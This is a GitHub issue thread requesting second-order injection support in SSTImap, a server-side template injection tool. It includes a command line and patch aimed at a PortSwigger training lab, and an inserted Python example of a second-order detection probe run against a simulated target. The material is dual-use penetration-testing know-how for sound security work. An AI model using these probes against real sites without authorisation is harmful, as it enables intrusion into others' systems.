SSTImap

No second order support.

Open sectroyer opened this issue 2 years ago • 4 comments

I will use PortSwigger's "Basic server-side template injection (code context)" task as an example, but I have encountered the same issue elsewhere.

Currently there is no way to specify a second-order URL; however, it's pretty simple to implement. I didn't add a specific switch, but in the code I just had to add two lines. I used this command line:

    ./sstimap.py -u "https://0a70002e03773a3d81129428007b00eb.web-security-academy.net/my-account/change-blog-post-author-display" -d "blog-post-author-display=user.first_name&csrf=xGbHC88kaLt5KmNUTq7zw3wZ3fMDDAGx" --cookie 'session=Sk45UsfrkQRg3siVdnHxV8uBhDFG20gJ' -A -e Tornado

And changed those lines:

        # hard-coded for the experiment; should come from self.args
        second_order_url="https://0a70002e03773a3d81129428007b00eb.web-security-academy.net/post?postId=6"
        try:
            # first-order request: submits the payload
            result = requests.request(method=self.http_method, url=url_params, params=get_params, data=post_params,
                                      headers=header_params, proxies=self.proxies, verify=self.args.get('verify_ssl'), allow_redirects=False).text
            # second-order request: overwrite result with the page where the payload is rendered
            result = requests.get(second_order_url,cookies=cookies,proxies=self.proxies,verify=False).text

A simple if that checks whether second_order_url is in self.args should suffice IMHO.

sectroyer avatar May 15 '23 19:05 sectroyer

This is a great idea! I will add this feature soon.

vladko312 avatar May 16 '23 04:05 vladko312

There are other cases that need a deeper fix:

  • Second order based on returned data (ID of the created post)
  • Reset required after every attempt (deleting a comment to fix HTTP error 500)
  • Reset based on data
  • Reset or second order not being HTTP (email, websockets, ...)

Some of these cases need extra parameters that are unlikely to be used outside of them. I decided to move the requesting functionality to a separate module in the future, with a way to add custom parameters for that module.

For now, I don't have a lot of time, so this functionality will appear later.

vladko312 avatar May 26 '23 19:05 vladko312
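The two-request flow sectroyer patched in above (submit the payload at one URL, read the rendered result at another) and the "reset required after every attempt" case from the list above, written out as a stand-alone probe. This is an added illustration, not SSTImap's code or a proposed patch: the probe takes a transport callable and an optional reset hook, and FakeBlog is a constructed in-memory stand-in for a vulnerable target so the code runs offline. FakeBlog renders the stored value in a plain value context with a {{ }} evaluator restricted to arithmetic; the PortSwigger lab discussed above is a code-context injection, which this simulation does not reproduce. The requests_transport helper and the URL paths are assumptions for the example.

```python
"""Second-order SSTI probe: inject at one endpoint, observe at another,
optionally resetting target state after every attempt. Added example, not
SSTImap code; FakeBlog is a constructed stand-in, not a real service."""
import re
import secrets
from typing import Callable, Dict, Optional

# A transport maps (method, url, form_data) to the response body text.
Transport = Callable[[str, str, Dict[str, str]], str]

# Candidate syntaxes; {a} and {b} are filled with random factors. Doubled
# braces are str.format escapes, so the first entry renders as {{a*b}}.
TEMPLATES: Dict[str, str] = {
    "tornado/jinja2": "{{{{{a}*{b}}}}}",
    "mako": "${{{a}*{b}}}",
    "erb": "<%= {a}*{b} %>",
}


def make_marker():
    """Two random 4-digit factors; their 7-8 digit product is unlikely to
    appear in a page by chance, unlike the classic 49."""
    a = 1000 + secrets.randbelow(9000)
    b = 1000 + secrets.randbelow(9000)
    return a, b, str(a * b)


def probe_second_order(transport: Transport, inject_url: str, param: str,
                       base_params: Dict[str, str], observe_url: str,
                       templates: Dict[str, str] = TEMPLATES,
                       reset: Optional[Callable[[], None]] = None) -> Optional[str]:
    """Return the name of the first syntax that is evaluated on observe_url
    after being submitted to inject_url, or None if nothing is evaluated.

    A hit requires the product to appear in the observed page while the raw
    payload does not, so a plain echo of the input is not mistaken for
    evaluation. If reset is given it runs after every attempt, so a payload
    that broke the page (the "HTTP 500" case) does not poison later ones."""
    for name, fmt in templates.items():
        a, b, expected = make_marker()
        payload = fmt.format(a=a, b=b)
        data = {**base_params, param: payload}
        try:
            transport("POST", inject_url, data)        # first order: store it
            body = transport("GET", observe_url, {})   # second order: observe it
        finally:
            if reset is not None:
                reset()
        if expected in body and payload not in body:
            return name
    return None


def requests_transport(cookies: Dict[str, str], verify: bool = True,
                       proxies=None) -> Transport:
    """Transport over the real network using the requests library (imported
    lazily so the rest of this module works without it). Assumption: a
    session cookie is all that is needed to act as the logged-in user."""
    import requests
    session = requests.Session()
    session.cookies.update(cookies)

    def send(method, url, data):
        r = session.request(method, url, data=data or None, proxies=proxies,
                            verify=verify, allow_redirects=False, timeout=15)
        return r.text
    return send


class FakeBlog:
    """Constructed vulnerable target. POST stores the author display field;
    GET /post renders it through a {{ }} evaluator limited to arithmetic so
    the simulation stays harmless. vulnerable=False echoes it unrendered."""
    INJECT = "/my-account/change-blog-post-author-display"   # assumed path
    OBSERVE = "/post"                                        # assumed path

    def __init__(self, vulnerable: bool = True):
        self.vulnerable = vulnerable
        self.display = "user.first_name"

    def transport(self, method: str, url: str, data: Dict[str, str]) -> str:
        if method == "POST" and url == self.INJECT:
            self.display = data.get("blog-post-author-display", self.display)
            return "OK"
        if method == "GET" and url.startswith(self.OBSERVE):
            shown = self._render(self.display) if self.vulnerable else self.display
            return "<h1>Post 6</h1><p>by %s</p>" % shown
        return "404"

    def reset(self):
        """Restore the pre-test state, like deleting a poisoned comment."""
        self.display = "user.first_name"

    @staticmethod
    def _render(text: str) -> str:
        def evaluate(m):
            expr = m.group(1).strip()
            if not re.fullmatch(r"[\d\s*+()-]+", expr):
                return m.group(0)            # non-arithmetic: left as-is
            return str(eval(expr))           # the engine's evaluation step
        return re.sub(r"\{\{(.*?)\}\}", evaluate, text)


if __name__ == "__main__":
    blog = FakeBlog()
    hit = probe_second_order(blog.transport, FakeBlog.INJECT,
                             "blog-post-author-display", {"csrf": "token"},
                             "/post?postId=6", reset=blog.reset)
    print("evaluated as:", hit)
```

Against a real target you would pass requests_transport({"session": "..."}) as the transport and the lab's change-display and post URLs as inject_url and observe_url; the reset hook is whatever undoes the stored payload (re-posting the original value, deleting the comment, and so on), which is why it is a callable rather than a URL.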

Hi there! Any update regarding the second order feature? I started thinking of how to implement this, so feel free to share if you already have something in mind or some prototype.

Molx32 avatar Jan 03 '24 23:01 Molx32

@Molx32 I have some plans to add a way to do complex workflows with any amount of requests and a possibility for second order. This would also cover cases where you need to obtain a new session or remove your payloads to recover functionality on a vulnerable page.

vladko312 avatar Jan 03 '24 23:01 vladko312